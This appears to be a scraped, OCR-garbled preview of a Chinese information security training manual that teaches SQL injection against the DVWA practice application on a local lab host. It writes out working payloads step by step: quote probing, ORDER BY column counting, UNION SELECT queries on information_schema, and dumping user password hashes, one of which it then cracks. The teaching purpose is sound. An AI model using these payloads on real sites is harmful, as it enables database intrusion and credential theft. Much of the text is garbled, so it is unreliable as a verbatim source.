信息安全技术与应用实训指导书.docx
《信息安全技术与应用实训指导书.docx》由会员分享,可在线阅读,更多相关《信息安全技术与应用实训指导书.docx(220页珍藏版)》请在课桌文档上搜索。
1、信息安全发展态势与知识拓展实训项目指导手册目录Web安钿用分析之SQ1.注入及惭配JS1.()()()实脸概述-.2实验环境实验流程.3任务1环境准备任务2判断注入点.5任务3任务4任务5任务6猜测字段数执行Union联合街旬获取数也10*.Web安全应用分析之SQ1.注入及防护配置实验概述SQ1.注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的雄忽,通过SQ1.语句,实现无账号登录,甚至篡改数据库。凡有SQ1.注入漏洞的程序都是因为程序要接受来自客户端用户输入的变用或UR1.传递的参数,并且这个变量或参数是组成SQ1.语句的一部分.DVWA(Da
2、mVu1.nerab1.eWebAPP1.iCation)是用PHP+Mysq1.编写的一套用于常规Web漏洞教学和检测的Web脆弱性测试程序,提供1.ow.Medium.High.Impossib1.e四个安全级别,包含了SQ1.注入、SS,CSRF等常见的Web安全屈洞1.HaCkBar是FirefoX提供的插件,主要功能有:网址的栽入访问、联合直询、各种编码/解码、数据加密等.HaCkBar可以帮助安全人员测试SQ1.注入、XSS.CSRF等安全高同以及网站的安全性.实验环境攻击机:WindowsServer2016(OI-WindoWS攻击机),IP:192.168.200.130靶机
3、:WindowsServer2016(O1.-Windows攻击机),IP:192.168.2.130集成环境:PhPStUdy网站:DVWA-v1.10,Iow安全级SI1.前提条件本实睑要求: 熟恐WindoWS基本操作 熟恐基本的SQ1.语句实验流程实验目标完成本实验后,将能够: 了解SQ1.注入原理 掌握基本SQ1.注入方法 掌握SQ1.注入漏洞防护方法任务1环境准备【任务目标】启动动态网站集邮境,并访问SQ1.注入站点.【任务步骤)1 .启动动态网站集成环境双击桌面的Phpstudyrt集成环境,并单击启动按钮,运行网站.2.浏览器访问SQ1.注入站点双击桌面的火狐浏览器,在UR1.
4、地址栏中输入:http127.0.0.1dvwa1.ogin.php输入默认账号和宓码登录网站:账号:admin密码:passwordTDIBBt)CMW|Xaa)a(WGenera1.InstructionsWetoDamnVu1.nerab1.eWebApp1.ication!DvWmoMitcatotMMWMIM*W0QtfMtwM*Wto*4to*i2iWMtCVgVIVMM2agMM-91MU(*4Mt*MMSUMre4M0Mr1.M*MWiX*c*c*wv*rG0*M*rtce*wr4roiMJIWMMtfIve4vkWVrWMMtfMWg.fCv12IWyhmtOMM*eZmto
5、nd。imAdgIUMKweMT7HmwnctVmmMif1.ockmcMZUMCCtrMtapfeIyGdgBvoe*VMun.rm4MKMMWMAMMFMva(MM)FMMhctcmXratMant2Be三(Wf1.MMtMkrV11Mmantintarwadarrtrvrtworr*nattrtctrafWfwrJ*iMv单击左侧菜单导肮栏的SQ1.Injection,进入SQ1.注入页面.Brut*FcewCofMnandMtkmCSItFF1.kInC1.UMoa1.F1.1.1.kMdtowcwCAFTCHAUMfOSuMVu1.nerabi1.ity:SQ1.InjectionM
6、oreInformationMXkVMon(1.M)WukSMk0IDvXS8(00MXSSiIteftoctodIXS(StorCSPBypM*任务2判断注入点【任务目标】利用加单引号等方式,判断页面是否存在注入点。【任务步噱】1.判断是否存在注入点在输入框中,输入:1并单击Submit按钮提交.页面回显了ID为1的用户姓名信息,说明页面正常.继续在输入糖中,输入:1并单击uSubmit按钮提交。页面报错并显示了错误信息,根据错误信息可以了解到此错误为语法错误,数据库类型为MySQ1.e注:因为该站点为字符型注入漏洞,所以需要构造闭合语句.构造如下闭合逻辑语句:1and1=1#可以看到语句能
7、够成功被服务器执行,并显示正常的页面信息.继续构造闭合逻辐语句:1and1=2#可以看到语句能够成功被服务器执行,但页面没有正常信息回显.根据以上执行结果判断,该页面确定存在SQ1.注入漏洞.任务3猜测字段数【任务目标】通过Orderby猜测查询的字段数量。【任务步噱】1.猜测字段数为10构造如下闭合语句:1 ,orderby10#Vu1.nerabi1.ity:SQ1.InjectionUserID:rorderby10,SubmitMoreInformation页面报错,并显示不存在10个长度的字段,说明字段数小于10.因此范围在1到10之间。XMtY)彷史045三()XRD懵Shttp7
8、127.0.bnit-Subrr+127Qo1.IdvwaMncbi1.itiesq1.Wid:UrderbyNO一CSSfUnknOWnCoIUM10in,orderc1.ause2 .猜测字段数为5一般采用二分方法来猜测字段数,如:第一次猜测为100,下一次为50,再下一次为25以此类推,直到猜出正确的字段数.继续构造:1,orderby5#,同样显示错误,说明数量不为5.文件a(E)100历史(三)书?5CB)IRQ)M助(三)http:127.0.bm=SubmgX+,;)127.0.0.1dvwavu1.nerabiIities/sq1.i/?id=+order+by5+%WXCtS
9、Unknownco1.umn,5,inorderc1.ause3 .猜测字段数为3继续构造:1,orderby3#,同样显示错误,说明数量不为3。文件(D:)(y)历史不答(R)IM(Det(三)http1.270.bmit-Sbmit*X+127.0.0.1/dvwa/vu1.nefab1.rties/sq1.i/?d三*orderby3*%C“百StE+KInknOwnco1.umn3inorderc1.ause,4 .猜测字段数为2继续构造:1,orderby2#,页面显示正常,说明字段数量为2.Vu1.nerabi1.ity:SQ1.InjectionUSer10:rorderby2S
10、ubmit:D:1,ordrby2Firstnt:Surneme:retainMoreInformation任务4执行Union联合查询【建目标】通过执行union联合查询,确定回显位苴。【任务步骤】1.构造联合查询语句确定查询字段数量后,可以通过联合直询语句来确定数据回显的位置,最后通过该位置获取数据库中的敏感信息.构造如下语句:1unionse1.ect1.2#,有多少个字段数,se1.ect后面就加上对应的数字。Vu1.nerabi1.ity:SQ1.InjectionU*rIOSutvnrtXD:1.unionse1.ectI,2Firstnane:dinSurnae:anine1.e
11、ct1,2t1V此处的1和2即为回显位置任务5获取数据【任务目标】通过构造并执行unionse1.ect查询语句,获取数据库中的数据信息.【任务步骤】1 .获取数据库相关信息通过内嵌函数version。,database。等获取数据库版本信息和数据库名.构造语句:1unionse1.ectVerSiOnO,database。#Vu1.nerabi1.ity:SQ1.InjectionU*rIDSubmitXD:1*unionse1.ectversionOdatabaseOIFirstnae:dninSurndwe:annID:1.unionse1.ectversion),databasecri
12、60fXMrthwv1.wBBf1.MRTM1.Iiw1. ht!ptfgwfcipdaorQMVSQ1.incton httD,.、;/一;*得到数据库名为:dvwa,MySQ1.数据库版本为5.5.53.2 .获取数据库表名在MySQ1.版本大于5时,默认存在information.schema库,该库中存在其他库的所有数据.根据已经获得的信息,继续构造语句,获取数据库表名:1unionse1.ecttab1.e_name,2frominformation_schema.tab1.eswheretab1.e-schema=,dvwa,#Vu1.nerabi1.ity:SQ1.Injecti
13、onUW1.OSutxntID:1,un100se1.ecttb1.oj4e,2frannfo11Mtonscbev*a.tab1.eswheretab1.escirscnw:dnnSumane:ae,2frcatnforB*t1.onscheM.XAto1.eswheretab1.e*firstnM:9uabsekSurn*M:211XD:1uniona1.cttb1.j*w,2fromInfaxnatian_acbSM.tbIawheretb1._acF15Cne:U3。9rnn9:2-MoreInformation可以看到,在1的回显位置上,显示了两张数据库表名:guestbook,us
14、ers.其中USerS表名存在管理员帐号密码可能性最大.3 .获取字段名继续构造联合查询语句,获取USerS表的字段名:1unionse1.ectco1.umnname,2frominformation.SChema.co1.umnswheretab1.e-schema=dvwa,andtab1.e-name=users#Vu1.nerabi1.ity:SQ1.Injection*M:1337Surnan:843533d7223966d78”cc69216bXD:1unionse1.ectua*r,pAi4wor:Gd1.07d09f5bbe40cadeie5c71e9e9b7XD:&tuni
15、onse1.ecturfpasswordfron9Firstnone:smithySurnewe:Sf4dcc3b5aa76M61d8327882cf99最终得到5个用户的账号和密码,其中包括管理员账号和密码:admin5f4dcc3b5aa765d61d8327deb882cf995 .密码解密由于多数站点的默认:库用户密码加密方式为:MDS哈希算法,而dvwa站点默认也是采用此算法进行密码加密.因此,可以将密码放到在线解空网站进行解密.例如:最终得到admin用户的密码为password任务6SQ1.注入防护【任务目标】通过在页面中加入防护代码,实现对SQ1.注入漏洞的代码级防护效果.【任
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 信息 安全技术 应用 指导书
链接地址:https://www.desk33.com/p-1679746.html